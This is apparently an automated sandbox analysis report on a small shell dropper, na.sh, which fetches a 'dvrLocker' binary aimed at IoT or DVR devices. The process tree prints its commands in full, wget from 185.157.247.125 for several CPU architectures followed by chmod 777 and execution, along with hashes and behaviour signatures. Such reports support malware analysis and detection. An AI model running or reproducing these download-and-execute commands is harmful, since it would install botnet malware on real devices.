Analysis
-
max time kernel
141s -
max time network
134s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
10-10-2024 07:02
Static task
static1
Behavioral task
behavioral1
Sample
na.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
na.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
na.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
na.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
na.sh
-
Size
372B
-
MD5
6b2644c0adca68c54a53a79842eb3b3c
-
SHA1
d26ec0f0fc70fcb713aba5fa56912809cefb8bc0
-
SHA256
89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f
-
SHA512
943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid Process 728 chmod 736 chmod 747 chmod 758 chmod 763 chmod -
Deletes itself 1 IoCs
Processes:
dvrLockerpid Process 730 dvrLocker -
Executes dropped EXE 5 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid Process /dvrLocker 730 dvrLocker /dvrLocker 738 dvrLocker /dvrLocker 749 dvrLocker /dvrLocker 759 dvrLocker /dvrLocker 764 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 77.88.8.8 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 4 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
Processes:
dvrLockerdescription ioc Process File opened for reading /proc/381/maps dvrLocker File opened for reading /proc/382/maps dvrLocker File opened for reading /proc/680/maps dvrLocker File opened for reading /proc/683/maps dvrLocker -
Changes its process name 1 IoCs
Processes:
dvrLockerdescription pid Process Changes the process name, possibly in an attempt to hide itself 730 dvrLocker -
Processes:
dvrLockerdescription ioc Process File opened for reading /proc/1494/cmdline dvrLocker File opened for reading /proc/1715/cmdline dvrLocker File opened for reading /proc/738/cmdline dvrLocker File opened for reading /proc/971/status dvrLocker File opened for reading /proc/1121/cmdline dvrLocker File opened for reading /proc/1140/cmdline dvrLocker File opened for reading /proc/1182/cmdline dvrLocker File opened for reading /proc/1627/cmdline dvrLocker File opened for reading /proc/1511/cmdline dvrLocker File opened for reading /proc/1670/cmdline dvrLocker File opened for reading /proc/1032/cmdline dvrLocker File opened for reading /proc/1257/cmdline dvrLocker File opened for reading /proc/775/cmdline dvrLocker File opened for reading /proc/1063/cmdline dvrLocker File opened for reading /proc/1586/cmdline dvrLocker File opened for reading /proc/1632/cmdline dvrLocker File opened for reading /proc/1863/cmdline dvrLocker File opened for reading /proc/786/cmdline dvrLocker File opened for reading /proc/1514/cmdline dvrLocker File opened for reading /proc/1769/cmdline dvrLocker File opened for reading /proc/1803/cmdline dvrLocker File opened for reading /proc/1828/cmdline dvrLocker File opened for reading /proc/1331/cmdline dvrLocker File opened for reading /proc/914/cmdline dvrLocker File opened for reading /proc/961/cmdline dvrLocker File opened for reading /proc/1056/cmdline dvrLocker File opened for reading /proc/1136/cmdline dvrLocker File opened for reading /proc/1289/cmdline dvrLocker File opened for reading /proc/1660/cmdline dvrLocker File opened for reading /proc/841/cmdline dvrLocker File opened for reading /proc/846/cmdline dvrLocker File opened for reading /proc/906/cmdline dvrLocker File opened for reading /proc/924/cmdline dvrLocker File opened for reading /proc/1167/cmdline dvrLocker File opened for reading /proc/1847/status dvrLocker File opened for reading /proc/1856/cmdline dvrLocker File opened for reading /proc/779/cmdline dvrLocker File opened for reading /proc/953/cmdline dvrLocker File opened for reading /proc/1649/cmdline dvrLocker File opened for reading /proc/1742/cmdline dvrLocker File opened for reading /proc/1800/cmdline dvrLocker File opened for reading /proc/909/cmdline dvrLocker File opened for reading /proc/1156/cmdline dvrLocker File opened for reading /proc/1170/cmdline dvrLocker File opened for reading /proc/1288/cmdline dvrLocker File opened for reading /proc/1612/cmdline dvrLocker File opened for reading /proc/14/cmdline dvrLocker File opened for reading /proc/744/cmdline dvrLocker File opened for reading /proc/746/cmdline dvrLocker File opened for reading /proc/1068/cmdline dvrLocker File opened for reading /proc/4/cmdline dvrLocker File opened for reading /proc/852/cmdline dvrLocker File opened for reading /proc/930/cmdline dvrLocker File opened for reading /proc/1541/cmdline dvrLocker File opened for reading /proc/1889/cmdline dvrLocker File opened for reading /proc/1897/cmdline dvrLocker File opened for reading /proc/70/cmdline dvrLocker File opened for reading /proc/1544/cmdline dvrLocker File opened for reading /proc/1641/cmdline dvrLocker File opened for reading /proc/1730/cmdline dvrLocker File opened for reading /proc/1740/cmdline dvrLocker File opened for reading /proc/1108/status dvrLocker File opened for reading /proc/1254/cmdline dvrLocker File opened for reading /proc/1341/cmdline dvrLocker -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
na.shdescription ioc Process File opened for modification /tmp/0 na.sh
Processes
-
/tmp/na.sh/tmp/na.sh1⤵
- Writes file to tmp directory
PID:710 -
/bin/rmrm -rf dvrLocker2⤵PID:712
-
-
/usr/bin/wgetwget http://185.157.247.125/c/empsl -O -2⤵PID:714
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:728
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Deletes itself
- Executes dropped EXE
- Reads process memory
- Changes its process name
- Reads runtime system information
PID:730
-
-
/usr/bin/wgetwget http://185.157.247.125/c/emips -O -2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:736
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:738
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:738
-
-
/usr/bin/wgetwget http://185.157.247.125/c/earm -O -2⤵PID:746
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:747
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:749
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:749
-
-
/usr/bin/wgetwget http://185.157.247.125/c/earm7 -O -2⤵PID:756
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:758
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:759
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:759
-
-
/usr/bin/wgetwget http://185.157.247.125/c/ex86 -O -2⤵PID:762
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:763
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:764
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:764
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
41KB
MD53cfc76868e26201ac03e0583b7c8aaba
SHA103436d9d090e1f944fecf60adc1e45f90df20c26
SHA2568c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
SHA51284add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2